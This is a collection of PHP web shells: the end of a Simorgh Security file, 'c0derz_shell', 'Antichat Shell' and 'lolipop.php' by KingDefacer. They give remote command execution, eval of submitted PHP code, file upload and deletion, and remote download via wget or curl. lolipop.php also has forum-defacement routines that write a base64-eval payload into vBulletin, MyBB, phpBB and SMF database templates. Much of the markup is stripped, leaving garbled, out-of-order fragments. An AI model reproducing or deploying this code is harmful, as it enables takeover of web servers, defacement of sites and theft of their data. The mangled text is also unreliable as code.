367 | 			Copyright 2004-Simorgh Security

368 | 			Hossein-Asgari

369 | 			
370 | 		
371 | 		www.simorgh-ev.com

374 | 

375 | 
376 | 
377 | 
378 | 


--------------------------------------------------------------------------------
/Collection/c0derz_shell.php:
--------------------------------------------------------------------------------
  1 | 
Error 401
Unauthorized access!
");
 36 | }
 37 | if($achtung)
 38 |   error_reporting(E_ALL&~E_NOTICE);
 39 | else
 40 |   error_reporting(0);
 41 |   //---------------------
 42 | 
 43 | //get page generating time
 44 | if (!function_exists("get_micro_time")) {
 45 |  function get_micro_time() {
 46 |   list($usec, $sec) = explode(" ", microtime());
 47 |   return ((float)$usec + (float)$sec);
 48 |  }
 49 | }
 50 | define("start_time",get_micro_time());
 51 | $cshver=".::[csh]::. v. 0.1.1 release";
 52 |  //-------------------------------
 53 | 
 54 |  //normalize text encoding
 55 |  function decode($buffer){
 56 | return  convert_cyr_string ($buffer, 'd', 'w');
 57 | }
 58 | //---------------------------------
 59 | 
 60 | ?>
 61 | 
 62 | 
 63 | 
 64 | 
 65 | 
 66 | .:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]";
 68 | ?>
 69 | 
 70 | 
 94 | 
 95 | 
 96 | 

 97 | 
 98 | 

 99 | 

100 | 
101 |   
142 |  
143 |  

102 | 
103 | 
104 |  
105 | 
106 |   
114 |  
115 |  

107 |   
108 | 
109 | Server info:
";
111 | ?>
112 | 
113 |  

116 | 
117 | ".$SERVER_NAME."
";
120 | echo "Server IP adress:".$server_ip=gethostbyname($SERVER_NAME)." 
";
121 | echo (($safe_mode)?("Safe Mode: ON
 "):
122 |          ("Safe Mode: OFF
 "));
123 | echo "OS: ";
124 |  if (empty($uname)){
125 |   echo (php_uname()."
");
126 |  }else
127 |   echo $uname."
";
128 |   echo 'User: ' .get_current_user() . '
';
129 |    echo "HTTP Server: ".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."
";
130 |  echo ("PHP: ".phpversion()."
 ");
131 |   echo ("MySQL: ");
132 |  if($mysql_stat=function_exists('mysql_connect')){
133 |   echo "ON ";
134 |  }
135 |  else {
136 |   echo "OFF 
";
137 |  }
138 |  //---------------------------
139 |  ?>
140 | 
141 |  

144 | 
145 | 
146 | 

147 | 
.::[Shell functions]::.

148 | 
149 | 
150 | 
151 |   
155 |  
156 |  

152 |  
153 | " title="./$shell">./ $shell

154 | 

157 | 
158 | 
159 |   
163 |  
164 |  

160 |  
161 | " title="PHP code execution">./php execution

162 | 

165 |  
166 | 
167 |   
171 |  
172 |  

168 |  
169 | " title="Upload file to server">./ upload file

170 | 

173 | 

174 | 

175 | 

176 | 

177 | 

178 | 

179 | 
180 | 

181 | 

182 | 
183 | 
184 |   
188 | ";
201 | $head_text="Shell:";
202 | chdir($dir);
203 | 
204 | function execute($com)
205 | {
206 | 
207 |  if (!empty($com))
208 |  {
209 |   if(function_exists('exec'))
210 |    {
211 |     exec($com,$arr);
212 |    echo implode('
213 | ',$arr);
214 |    }
215 |   elseif(function_exists('shell_exec'))
216 |    {
217 |     echo shell_exec($com);
218 |    }
219 |   elseif(function_exists('system'))
220 | {
221 |     echo system($com);
222 | }
223 |   elseif(function_exists('passthru'))
224 |    {
225 |     echo passthru($com);
226 |    }
227 | }
228 | 
229 | }
230 | if ($cmd){
231 | 
232 | if($sertype == "winda"){
233 | ob_start();
234 | execute($cmd);
235 | $buffer = "";
236 | $buffer = ob_get_contents();
237 | ob_end_clean();
238 | }
239 | else{
240 | ob_start();
241 | echo decode(execute($cmd));
242 | $buffer = "";
243 | $buffer = ob_get_contents();
244 | ob_end_clean();
245 | }
246 | if (trim($buffer)){
247 | echo "

185 | 
186 | 
187 | 

189 | 
190 | 

191 | [".getcwd()."]
Executed command: [$cmd]
";
250 | }
251 | }
252 | echo "

253 | 

254 | 
[".get_current_user()."@".$SERVER_NAME."]: 

255 | 
Current directory: 
258 | \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
";
259 | break;
260 | case "phpcode":
261 | $head_text="PHP code execution:";
262 | echo "
PHP code:



263 |                                      \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
";
264 | echo "
Results of PHP execution:
";
265 | @eval(stripslashes($_POST['phpcode']));
266 | echo "
";
267 | break;
268 | case "upload":
269 | echo"

270 | 
271 | 
272 | 

273 | 
274 | 
275 | 
276 | 
277 | 
278 | 
279 | 
280 | 
File:
Path:
";
281 | if (isset($_POST['path'])){
282 | $uploadfile = $_POST['path'].$_FILES['file']['name'];
283 | if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
284 | echo"
";
285 | if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
286 |     echo "File sucessfuly uploaded in to directory: [$uploadfile]
";
287 |     echo "Name: [".$_FILES['file']['name']. "]
";
288 |     echo "Size: [" .$_FILES['file']['size']. "] Bytes
";
289 | } else {
290 |     print "Couldn't to upload file. Information:
";
291 |     print_r($_FILES);
292 | }
293 | echo"
";
294 | }
295 | break;
296 | }
297 | ?>
298 | 
299 |  
300 |   
301 |  
302 | 
303 |   
304 | 
305 | 
306 |   
307 | 
308 | 

309 |  
310 | 
311 |   
312 | 
313 | 

314 |  
315 | 
316 | 

317 | 
318 | 
319 | 
320 | 
321 | 
322 |   
331 |  
332 |  

323 | 
324 | 

325 | 
326 | [".round(get_micro_time()-start_time,4). "] seconds.]=-";
328 | ?>
329 | 
330 |  

333 | 
334 | 


--------------------------------------------------------------------------------
/Collection/Antichat_Shell.php:
--------------------------------------------------------------------------------
  1 | 
 11 | BODY{
 12 |   background-color: #2B2F34;
 13 |   color: #C1C1C7;
 14 |   font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
 15 |   MARGIN-TOP: 0px;
 16 |   MARGIN-BOTTOM: 0px;
 17 |   MARGIN-LEFT: 0px;
 18 |   MARGIN-RIGHT: 0px;
 19 |   margin:0;
 20 |   padding:0;
 21 |   scrollbar-face-color: #336600;
 22 |   scrollbar-shadow-color: #333333;
 23 |   scrollbar-highlight-color: #333333;
 24 |   scrollbar-3dlight-color: #333333;
 25 |   scrollbar-darkshadow-color: #333333;
 26 |   scrollbar-track-color: #333333;
 27 |   scrollbar-arrow-color: #333333;
 28 | }
 29 | input{
 30 |   background-color: #336600;
 31 |   font-size: 8pt;
 32 |   color: #FFFFFF;
 33 |   font-family: Tahoma;
 34 |   border: 1 solid #666666;
 35 | }
 36 | select{
 37 |   background-color: #336600;
 38 |   font-size: 8pt;
 39 |   color: #FFFFFF;
 40 |   font-family: Tahoma;
 41 |   border: 1 solid #666666;
 42 | }
 43 | textarea{
 44 |   background-color: #333333;
 45 |   font-size: 8pt;
 46 |   color: #FFFFFF;
 47 |   font-family: Tahoma;
 48 |   border: 1 solid #666666;
 49 | }
 50 | a:link{
 51 |   
 52 |   color: #B9B9BD;
 53 |   text-decoration: none;
 54 |   font-size: 8pt;
 55 | }
 56 | a:visited{
 57 |   color: #B9B9BD;
 58 |   text-decoration: none;
 59 |   font-size: 8pt;
 60 | }
 61 | a:hover, a:active{
 62 |   width: 100%;
 63 |   background-color: #A8A8AD;
 64 |   
 65 | 
 66 |   color: #E7E7EB;
 67 |   text-decoration: none;
 68 |   font-size: 8pt;
 69 | }
 70 | td, th, p, li{
 71 |   font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
 72 |   border-color:black;
 73 | }
 74 | ';
 75 | $header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.'';
 76 | $footer='';
 77 | 
 78 | //error parser
 79 | $filext="File already exists.";
 80 | $uploadok="File was successfully uploaded.";
 81 | $dircrt="Dir is created.";
 82 | $dircrterr="Don't create dir.";
 83 | $dirnf="Dir not found.";
 84 | $empty="Directory not empty or access denide.";
 85 | $deletefileok="File deleted";
 86 | $deletedirok="Dir deleted";
 87 | //end error parser
 88 | 
 89 | //auth
 90 | if(@$_POST['action']=="exit")unset($_SESSION['an']);
 91 | if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
 92 | if(@$_SESSION['an']==0){
 93 | echo $header;
 94 | echo '
Login:
Password:
';
 95 | echo $footer;
 96 | exit;}
 97 | //end auth
 98 | 
 99 | function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
100 | 
101 | 
102 | 
103 | if($_SESSION['action']=="")$_SESSION['action']="viewer";
104 | if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
105 | if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
106 | 
107 | $dir=chdir($dir);
108 | $dir=getcwd()."/";
109 | $dir=str_replace("\\","/",$dir);
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 
116 | //crdir
117 | 
118 | 
119 | if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
120 |   
121 | //Current type OS
122 | if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
123 | 
124 | 
125 | 
126 |  
127 |  
128 |  
129 | 
130 | //downloader
131 | if($action=="download"){ 
132 | header('Content-Length:'.filesize($file).'');
133 | header('Content-Type: application/octet-stream');
134 | header('Content-Disposition: attachment; filename="'.$file.'"');
135 | readfile($file);
136 | }
137 | //end downloader
138 | 
139 | //delete file
140 | if($action=="delete"){ 
141 | if(unlink($file)) $msgnotice.=$deletefileok;
142 | }
143 | //end delete
144 | 
145 | //delete dir
146 | if($action=="deletedir"){ 
147 | if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
148 | 
149 | }
150 | //end delete
151 | ?>
152 | 
153 |  
154 | 
155 | 

156 | 
157 | 
158 | 
159 | 
160 | 
161 | 
162 | 
163 | 
164 | 
165 | 
166 | 
| Shell | Viewer| Editor| Upload| Php Eval| EXIT | <-back | forward->|


167 | 

168 | 
169 | 
170 | 
171 | 

172 | 
173 | ";
309 |   if($GLOBALS['win']==1)echo $form_win;
310 |   if($GLOBALS['win']==0){
311 |     echo $form_win;
312 | 	echo '';	
314 | }
315 | 
316 | if(@$_POST['uploadloc']){
317 | if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
318 | $uploadfile = $dirupload."/".$_POST['filename'];
319 | 
320 | if(!file_exists($dirupload)){createdir($dirupload);}
321 | if(file_exists($uploadfile))echo $GLOBALS['filext']; 
322 | elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
323 | echo $GLOBALS['uploadok'];
324 | }
325 | 
326 | if(@$_POST['upload']){
327 |     if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
328 | 	switch($_POST['with'])
329 | 	{
330 | 	  case wget:
331 | 	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
332 | 	  break;
333 |  	  case fetch:
334 |  	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
335 |  	  break;
336 |  	  case lynx:
337 |  	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
338 |  	  break;
339 |  	  case links:
340 |  	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
341 |  	  break;
342 |  	  case GET:
343 |  	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
344 |  	  break;
345 |  	  case curl:
346 |  	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
347 |  	  break;
348 | 	 }
349 | 	}
350 |   
351 | }
352 | //end upload section
353 | 
354 | 
355 | if($action=="phpeval"){
356 |  echo "
357 | 
358 |  
359 |  <?php

360 | 

361 | ?>

362 | ";} 
363 | if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
364 | ?>
365 | 

174 | 
175 | 
176 | 
194 | 
195 | 

196 | 

197 | ";}
198 | //end shell
199 | 
200 | 
201 | //viewer FS
202 | function perms($file) 
203 | { 
204 |   $perms = fileperms($file);
205 |   if (($perms & 0xC000) == 0xC000) {$info = 's';} 
206 |   elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
207 |   elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
208 |   elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
209 |   elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
210 |   elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
211 |   elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
212 |   else {$info = 'u';}
213 |   $info .= (($perms & 0x0100) ? 'r' : '-');
214 |   $info .= (($perms & 0x0080) ? 'w' : '-');
215 |   $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
216 |   $info .= (($perms & 0x0020) ? 'r' : '-');
217 |   $info .= (($perms & 0x0010) ? 'w' : '-');
218 |   $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
219 |   $info .= (($perms & 0x0004) ? 'r' : '-');
220 |   $info .= (($perms & 0x0002) ? 'w' : '-');
221 |   $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
222 |   return $info;
223 | } 
224 | 
225 | function view_size($size)
226 | {
227 |  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
228 |  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
229 |  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
230 |  else {$size = $size . " B";}
231 |  return $size;
232 | }
233 | 
234 | function scandire($dir){
235 | 
236 | 
237 | 		
238 | echo "";
239 | echo "";
240 | 
241 | if (is_dir($dir)) {
242 |     if (@$dh = opendir($dir)) {
243 |         while (($file = readdir($dh)) !== false) {
244 | 		  if(filetype($dir . $file)=="dir") $dire[]=$file;
245 | 		  if(filetype($dir . $file)=="file")$files[]=$file;
246 | 		}
247 | 		closedir($dh);
248 | 		@sort($dire);
249 | 		@sort($files);
250 | 
251 | 
252 | if ($GLOBALS['win']==1) {
253 | echo "";
258 | }
259 | echo "
260 | ";
261 | for($i=0;$i';  
264 |   }
265 | for($i=0;$i
268 | 
269 | 
273 | '; 
274 | }
275 | echo "
Open directory:
Select drive:";
254 | for ($j=ord('C'); $j<=ord('Z'); $j++) 
255 |  if (@$dh = opendir(chr($j).":/"))
256 |  echo ' '.chr($j).'';
257 |  echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'X
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).'
270 | D
271 | E
272 | X
";
276 | }}}
277 | 
278 | if($action=="viewer"){
279 | scandire($dir);
280 | }
281 | //end viewer FS
282 | 
283 | //editros
284 | if($action=="editor"){  
285 |   function writef($file,$data){
286 |   $fp = fopen($file,"w+");
287 |   fwrite($fp,$data);
288 |   fclose($fp);
289 |   }
290 |   function readf($file){
291 |   if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
292 |   $contents = fread($le, filesize($file));
293 |   fclose($le);}
294 |   return htmlspecialchars($contents);
295 |   }
296 | if(@$_POST['save'])writef($file,$_POST['data']);
297 | echo "

298 | 
299 | 
300 | 

301 | 
";
302 | }
303 | //end editors
304 | 
305 | //upload
306 | if($action=="upload"){
307 |   if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
308 |   $form_win="
Upload to dir:
New file name:
File addres:
313 | 
COPYRIGHT BY ANTICHAT.RU 

366 | 


--------------------------------------------------------------------------------
/Collection/lolipop.php:
--------------------------------------------------------------------------------
  1 | 
 
  2 | ON"; 
 52 | } 
 53 | else 
 54 | { 
 55 |     $c_h = "OFF"; 
 56 | } 
 57 | 
 58 | //Kapali Fonksiyonlar 
 59 | if (''==($disfunc)) 
 60 | { 
 61 |     $dis = "None"; 
 62 | } 
 63 | else 
 64 | { 
 65 |     $dis = "$disfunc"; 
 66 | } 
 67 | //Dizin degisimi 
 68 | if(isset($_GET['dir']) && is_dir($_GET['dir'])) 
 69 | { 
 70 |  chdir($_GET['dir']); 
 71 | } 
 72 | 
 73 | $ccc = realpath($_GET['chdir'])."/"; 
 74 | 
 75 | //Baslik 
 76 | echo " 
 77 |  
102 | 
103 | Lolipop.php - Edited By KingDefacer - [$site]"; 
104 | //Ana tablo 
105 | echo " 
106 |  
107 |      
108 |          
114 |      
115 |           
117 |      
118 | 
 
109 | 
110 | 
111 |           Lolipop BETA ( Powered By KingDefacer ) 
112 | 
113 |     
 
116 |         Site: $site
Server name: $sname
Software: $info
Version : $version
Uname -a: $uname
Path: $ccc
Safemode: $c_h
Disable Functions: $dis
Page: $page
Your IP: $yourip
Server IP: $serverip
"; 
119 | echo '     
120 | '; 
121 | //Buton Listesi 
122 | echo "
"; 
123 | 
124 | 
125 | 
126 | 
127 | //VB HACK 
128 | if (isset($_POST['vbulletin'])) 
129 | { 
130 | echo "
 
131 | 
 
132 | 
==Lolipop VB index.==
 
133 |     
Mysql Host

 
134 |           DbKullanici

 
135 |           Dbadi

 
136 | 		  
137 |           Dbsifre

 
138 |           ?ndexin Yaz?lacag? B?l?m

 
139 |           
"; 
140 | die(); 
141 | } 
142 | $KingDefacer="Powered By Lolipop :))"; 
143 | $dbh = $_POST['dbh']; 
144 | $dbu = $_POST['dbu']; 
145 | $dbn = $_POST['dbn']; 
146 | $dbp = $_POST['dbp']; 
147 | $index = $_POST['index']; 
148 | $index=str_replace("\'","'",$index); 
149 | $set_index  = "{\${eval(base64_decode(\'"; 
150 | 
151 | $set_index .= base64_encode("echo \"$index\";"); 
152 | 
153 | 
154 | $set_index .= "\'))}}{\${exit()}}"; 
155 | 
156 | 
157 | if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) 
158 | { 
159 | mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); 
160 | mysql_select_db($dbn) or die(mysql_error()); 
161 | $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'"; 
162 | $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'"; 
163 | $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''"; 
164 | $result = mysql_query($loli1) or die (mysql_error()); 
165 | $result = mysql_query($loli2) or die (mysql_error()); 
166 | $result = mysql_query($loli3) or die (mysql_error()); 
167 | echo ""; 
168 | } 
169 | 
170 | //MyBB Hack 
171 | if (isset($_POST['mybulletin'])) 
172 | { 
173 | echo "
 
174 | 
 
175 | 
==Lolipop MyBB index.==
 
176 |     
Mysql Host

 
177 |           DbKullanici

 
178 |           Dbadi

 
179 |           Dbsifre

 
180 |           ?ndexin Yaz?lacag? B?l?m

 
181 |           
"; 
182 | die(); 
183 | } 
184 | $mybb_dbh = $_POST['mybbdbh']; 
185 | $mybb_dbu = $_POST['mybbdbu']; 
186 | $mybb_dbn = $_POST['mybbdbn']; 
187 | $mybb_dbp = $_POST['mybbdbp']; 
188 | $mybb_index = $_POST['mybbindex']; 
189 | 
190 | if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) 
191 | { 
192 | mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error()); 
193 | mysql_select_db($mybb_dbn) or die(mysql_error()); 
194 | $prefix="mybb_"; 
195 | $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; 
196 | 
197 | $result = mysql_query($loli7) or die (mysql_error()); 
198 | 
199 | echo ""; 
200 | } 
201 | //PhpBB 
202 | if (isset($_POST['phpbb'])) 
203 | { 
204 | echo "
 
205 | 
 
206 | 
==Lolipop PHPBB index.==
 
207 |     
Mysql Host

 
208 |           DbKullanici

 
209 |           Dbadi

 
210 |           Dbsifre

 
211 |           Yazi Veya  KOD

 
212 |           Degisecek KATEGORI ID si

 
213 |           
"; 
214 | die(); 
215 | } 
216 | $phpbb_dbh = $_POST['phpbbdbh']; 
217 | $phpbb_dbu = $_POST['phpbbdbu']; 
218 | $phpbb_dbn = $_POST['phpbbdbn']; 
219 | $phpbb_dbp = $_POST['phpbbdbp']; 
220 | $phpbb_kat = $_POST['phpbbkat']; 
221 | $kategoriid=$_POST['katid']; 
222 | 
223 | if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat)) 
224 | { 
225 | mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error()); 
226 | mysql_select_db($phpbb_dbn) or die(mysql_error()); 
227 | 
228 | 
229 | $loli10 = "UPDATE phpbb_categories  SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'"; 
230 | 
231 | $result = mysql_query($loli10) or die (mysql_error()); 
232 | 
233 | echo ""; 
234 | } 
235 | //SmfHACK 
236 | if (isset($_POST['smf'])) 
237 | { 
238 | echo "
 
239 | 
 
240 | 
==Lolipop SMF Index.==
 
241 |     
Mysql Host

 
242 |           DbKullanici

 
243 |           Dbadi

 
244 |           Dbsifre

 
245 |                     Yazi Yada KOD

 
246 |                     Degisecek KATEGORI ID si 

 
247 | 
248 |           
"; 
249 | die(); 
250 | } 
251 | $smf_dbh = $_POST['smfdbh']; 
252 | $smf_dbu = $_POST['smfdbu']; 
253 | $smf_dbn = $_POST['smfdbn']; 
254 | $smf_dbp = $_POST['smfdbp']; 
255 | $smf_index = $_POST['smf_index']; 
256 | $smf_katid=$_POST['katid']; 
257 | 
258 | if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index)) 
259 | { 
260 | mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error()); 
261 | mysql_select_db($smf_dbn) or die(mysql_error()); 
262 | $prefix="smf_"; 
263 | $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'"; 
264 | 
265 | $result = mysql_query($loli12) or die (mysql_error()); 
266 | 
267 | echo ""; 
268 | } 
269 | 
270 | 
271 | //Alt taraf 
272 | echo " 
273 | 
274 | 
275 | 
 
276 |  
277 |  
283 | 
 
278 | 
279 |   
Lolipop.php
 
280 |   
Edited By KingDefacer
 
281 | 

 
282 | 
"; 
284 | 
285 | 
286 | 
287 | // Kod bitisi 
288 | ?> 
289 | 


--------------------------------------------------------------------------------